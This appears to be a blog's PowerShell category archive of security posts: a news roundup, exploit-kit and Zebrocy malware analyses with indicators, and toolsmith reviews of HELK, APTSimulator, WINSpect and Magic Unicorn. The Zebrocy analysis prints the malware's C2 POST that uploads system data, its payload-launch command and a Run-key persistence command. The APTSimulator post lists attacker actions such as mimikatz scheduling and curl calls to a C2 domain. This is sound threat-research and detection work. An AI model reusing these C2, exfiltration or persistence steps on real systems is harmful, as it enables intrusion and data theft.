Category Archives: PowerShell

A week in security (January 14 – 20)

Last week on the Malwarebytes Labs blog, we took a look at how the government shutdown is influencing cybersecurity jobs, Advanced Persistent Threats group APT10, the comeback of Fallout EK, the hosting of malicious sites on legitimate servers, and the Collection 1 data breach.

Other cybersecurity news

  • New Zealand-based cryptocurrency exchange Cryptopia has gone offline after suffering a security breach, which resulted in significant losses. Cryptonia has notified and involved relevant government agencies, including the New Zealand police and the High-Tech Crimes Unit. (Source: Coindesk)
  • A former employee of a British company pleaded guilty to one count of gaining unauthorised access to a network with intent to commit further offences, and one count of committing unauthorised acts with the intent to impair the operation of a computer within a network. The employee was ordered to pay £20,000 compensation. (Source: Leamington Observer)
  • A California judge has ruled that American cops can’t force people to unlock a mobile phone with their face or finger. The ruling further protects people’s private lives from government searches, and is being hailed as a potentially landmark decision. (Source: Forbes)
  • The Oregon State Department of Administrative Services’ (DAS) Office of the State Chief Information Officer overpaid for services by between $400 million and $1.6 billion during the 2015 to 2017 timeframe, according to an audit by the Oregon Secretary of State Audit Division that looked at $8 billion of spending. (Source: CioDive)
  • The recent Windows security patch CVE-2019-0543 has introduced a breaking change for a PowerShell remoting scenario. It is a narrowly-scoped scenario that should have low impact for most users, as the breaking change only affects local loopback remoting. (Source: PowerShell Team Blog)
  • The Iceman cometh, his smartwatch told the cops: Hitman jailed after gizmo links him to Brit gangland slayings. Avid runner and hitman Mark Fellows was this week found guilty of murder after being grassed up by his Garmin watch. (Source: The Register)
  • Security flaws were discovered in ThreadX, a real-time operating system (RTOS) developed by Express Logic. The vendor claims on their website that ThreadX has over 6.2 billion deployments, being one of the most popular software-powering Wi-Fi chips. (Source: BleepingComputer)
  • Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. The attacker can use Telegram to communicate with the malware and send HTTPS-protected instructions. (Source: SC Media)
  • A Fortnite security flaw could have exposed players’ accounts. Security researchers found vulnerabilities on Epic’s site that could have let hackers access accounts. They were able to listen to Fortnite squad members speaking with each other and could have bought V-Bucks virtual currency using players’ stored credit card details. (Source: Engadget)
  • Pranks and challenges have always been popular on YouTube, but now the Google-owned company has set stricter guidelines for such content. A new YouTube support page provides details for a ban on pranks and challenges that cause immediate or lasting physical or emotional harm. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (January 14 – 20) appeared first on Malwarebytes Labs.

Improved Fallout EK comes back after short hiatus

After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year. During its absence, we noticed an increase in RIG EK campaigns, perhaps to fill that temporary void.

Fallout EK is distributed via malvertising chains (one of them we track under the name HookAds), especially through adult traffic. Since January 15, Fallout EK activity has been picking up pace again to deliver the GandCrab ransomware.

The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.

Fallout EK 2019 highlights:

  • HTTPS support
  • New landing page format
  • New Flash exploit (CVE-2018-15982)
  • Powershell to run payload

One aspect that caught our attention was how Fallout was delivering its payload via Powershell rather than using iexplore.exe. This was also mentioned in the EK developer’s advert reposted by Kafeine on his site.

The Base64 encoded Powershell command calls out the payload URL and loads it in its own way:

This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.

[ Edit: 2019-01-18] This technique is to bypass the Antimalware Scan Interface (AMSI) in Windows 10, which offers additional protection at the last stage of an attack. As described by @nao_sec.

What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proof of concepts. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.

Malwarebytes users are already protected against this updated Fallout EK.

Indicators of Compromise

185.56.233[.]186,advancedfeed[.]pro,HookAds Campaign

51.15.35[.]154,payformyattention[.]site,Fallout EK

The post Improved Fallout EK comes back after short hiatus appeared first on Malwarebytes Labs.

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Mostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7] Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list .
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

toolsmith #132 – The HELK vs APTSimulator – Part 2


Continuing where we left off in The HELK vs APTSimulator - Part 1, I will focus our attention on additional, useful HELK features to aid you in your threat hunting practice. HELK offers Apache Spark, GraphFrames, and Jupyter Notebooks  as part of its lab offering. These capabilities scale well beyond a standard ELK stack, this really is where parallel computing and significantly improved processing and analytics truly take hold. This is a great way to introduce yourself to these technologies, all on a unified platform.

Let me break these down for you a little bit in case you haven't been exposed to these technologies yet. First and foremost, refer to @Cyb3rWard0g's wiki page on how he's designed it for his HELK implementation, as seen in Figure 1.
Figure 1: HELK Architecture
First, Apache Spark. For HELK, "Elasticsearch-hadoop provides native integration between Elasticsearch and Apache Spark, in the form of an RDD (Resilient Distributed Dataset) (or Pair RDD to be precise) that can read data from Elasticsearch." Per the Apache Spark FAQ, "Spark is a fast and general processing engine compatible with Hadoop data" to deliver "lighting-fast cluster computing."
Second, GraphFrames. From the GraphFrames overview, "GraphFrames is a package for Apache Spark which provides DataFrame-based Graphs. GraphFrames represent graphs: vertices (e.g., users) and edges (e.g., relationships between users). GraphFrames also provide powerful tools for running queries and standard graph algorithms. With GraphFrames, you can easily search for patterns within graphs, find important vertices, and more." 
Finally, Jupyter Notebooks to pull it all together.
From Jupyter.org: "The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more." Jupyter Notebooks provide a higher order of analyst/analytics capabilities, if you haven't dipped your toe in that water, this may be your first, best opportunity.
Let's take a look at using Jupyter Notebooks with the data populated to my Docker-based HELK instance as implemented in Part 1. I repopulated my HELK instance with new data from a different, bare metal Windows instance reporting to HELK with Winlogbeat, Sysmon enabled, and looking mighty compromised thanks to @cyb3rops's APTSimulator.
To make use of Jupyter Notebooks, you need your JUPYTER CURRENT TOKEN to access the Jupyter Notebook web interface. It was presented to you when your HELK installation completed, but you can easily retrieve it via sudo docker logs helk-analytics, then copy and paste the URL into your browser to connect for the first time with a token. It will look like this,
http://localhost:8880/?token=3f46301da4cd20011391327647000e8006ee3574cab0b163, as described in the Installation wiki. After browsing to the URL with said token, you can begin at http://localhost:8880/lab, where you should immediately proceed to the Check_Spark_Graphframes_Integrations.ipynb notebook. It's found in the hierarchy menu under training > jupyter_notebooks > getting_started. This notebook is essential to confirming you're ingesting data properly with HELK and that its integrations are fully functioning. Step through it one cell at a time with the play button, allowing each task to complete so as to avoid errors. Remember the above mentioned Resilient Distributed Dataset? This notebook will create a Spark RDD on top of Elasticsearch using the logs-endpoint-winevent-sysmon-* (Sysmon logs) index as source, and do the same thing with the logs-endpoint-winevent-security-* (Window Security Event logs) index as source, as seen in Figure 2.
Figure 2: Windows Security EVT Spark RDD
The notebook will also query your Windows security events via Spark SQL, then print the schema with:
df = spark.read.format("org.elasticsearch.spark.sql").load("logs-endpoint-winevent-security-*/doc")
df.printSchema()
The result should resemble Figure 3.
Figure 3: Schema
Assuming all matches with relative consistency in your experiment, let's move on to the Sysmon_ProcessCreate_Graph.ipynb notebook, found in training > jupyter_notebooks. This notebook will again call on the Elasticsearch Sysmon index and create vertices and edges dataframes, then create a graph produced with GraphFrame built from those same vertices and edges. Here's a little walk-through.
The v parameter (yes, for vertices) is populated with:
v = df.withColumn("id", df.process_guid).select("id","user_name","host_name","process_parent_name","process_name","action")
v = v.filter(v.action == "processcreate")
Showing the top three rows of that result set, with v.show(3,truncate=False), appears as Figure 4 in the notebook, with the data from my APTSimulator "victim" system, N2KND-PC.
Figure 4: WTF, Florian :-)
The epic, uber threat hunter in me believes that APTSimulator created nslookup, 7z, and regedit as processes via cmd.exe. Genius, right? :-)
The e parameter (yes, for edges) is populated with:
e = df.filter(df.action == "processcreate").selectExpr("process_parent_guid as src","process_guid as dst").withColumn("relationship", lit("spawned"))
Showing the top three rows of that result set, with e.show(3,truncate=False), produces the source and destination process IDs as it pertains to the spawning relationship.
Now, to create a graph from the vertices and edges dataframes as defined in the v & e parameters with g = GraphFrame(v, e). Let's bring it home with a hunt for Process A spawning Process B AND Process B Spawning Process C, the code needed, and the result, are seen from the notebook in Figure 5.
Figure 5: APTSimulator's happy spawn
Oh, yes, APTSimulator fully realized in a nice graph. Great example seen in cmd.exe spawning wscript.exe, which then spawns rundll32.exe. Or cmd.exe spawning powershell.exe and schtasks.exe.
Need confirmation? Florian's CactusTorch JS dropper is detailed in Figure 6, specifically cmd.exe > wscript.exe > rundll32.exe.
Figure 6: APTSimulator source for CactusTorch
Still not convinced? How about APTSimulator's schtasks.bat, where APTSimulator kindly loads mimikatz with schtasks.exe for persistence, per Figure 7?
Figure 7: schtasks.bat
I certainly hope that the HELK's graph results matching nicely with APTSimulator source meets with your satisfaction.
The HELK vs APTSimulator ends with a glorious flourish, these two monsters in their field belong in every lab to practice red versus blue, attack and defend, compromise and detect. I haven't been this happy to be a practitioner in the defense against the dark arts in quite awhile. My sincere thanks to Roberto and Florian for their great work on the HELK and APTSimulator. I can't suggest strongly enough how much you'll benefit from taking the time to run through Part 1 and 2 of The HELK vs APTSimulator for yourself. Both tools are well documented on their respective Githubs, go now, get started, profit.
Cheers...until next time.

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not undervalue these two offerings.
HELK is incredibly easy to install. Its also well documented, with lots of related reading material, let me propose that you take the tine to to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone https://github.com/Cyb3rWard0g/HELK.git
  • cd HELK/
  • sudo ./helk_install.sh 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you, if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding update.microsoft.com mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2: msupdater.com
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executes nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM.

Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month, I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto consider HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advance Solutions as well, there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a Powershell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.


The script confirms that it's running with admin rights, checks PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Window Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.


 WINSpect then confirmed that UAC was enabled, and that it should notify me only apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.


WINSpect wrapped up with a quick check of configurable services, SMSvcHost is normal as part of .NET, even if I don't like it, but the flowExportService doesn't need to be there at all, I removed that a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enable...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts on the to-do list. 
Cheers...until next time.

Toolsmith Release Advisory: Magic Unicorn v2.8

David Kennedy and the TrustedSec crew have released Magic Unicorn v2.8.
Magic Unicorn is "a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory, based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by Dave and Josh Kelly at Defcon 18.

Version 2.8:
  • shortens length and obfuscation of unicorn command
  • removes direct -ec from PowerShell command
Usage:
"Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and Magic Unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system."


Toolsmith – GSE Edition: snapshot.ps1

I just spent a fair bit of time preparing to take the GIAC Security Expert exam as part of the requirement to recertify every four years. I first took the exam in 2012, and I will tell you, for me, one third of the curriculum is a "use it or lose it" scenario. The GSE exam covers GSEC, GCIH, and GCIA. As my daily duties have migrated over the years from analyst to leadership, I had to "relearn" my packet analysis fu. Thank goodness for the Packetrix VM and the SANS 503 exercises workbook, offsets, flags, and fragments, oh my! All went well, mission accomplished, I'm renewed through October 2020 and still GSE #52, but spending weeks with my nose in the 18 course books reminded of some of the great tools described therein. As a result, this is the first of a series on some of those tools, their value, and use case scenarios.
I'll begin with snapshot.ps1. It's actually part of the download package for SEC505: Securing Windows and PowerShell Automation, but is discussed as part of the GCIH curriculum. In essence, snapshot.ps1 represents one script to encapsulate activities specific to the SANS Intrusion Discovery Cheat Sheet for Windows.
The script comes courtesy of Jason Fossen, the SEC505 author, and can be found in the Day 5-IPSec folder of the course download package. The script "dumps a vast amount of configuration data for the sake of auditing and forensics analysis" and allows you to "compare snapshot files created at different times to extract differences."
To use snapshot.ps1 place the script into a directory where it is safe to create a subdirectory as the script creates such a directory named named for the computer, then writes a variety of files containing system configuration data.  Run snapshot.ps1 with administrative privileges.
The script runs on Windows 7, Server 2008, and newer Windows operating systems (I ran it on Windows 10 Redstone 2) and requires PowerShell 3.0 or later. You also need to have autorunsc.exe and sha256deep.exe in your PATH if you want to dump what programs are configured to startup automatically when your system boots and you login, as well as run SHA256 file hashes.
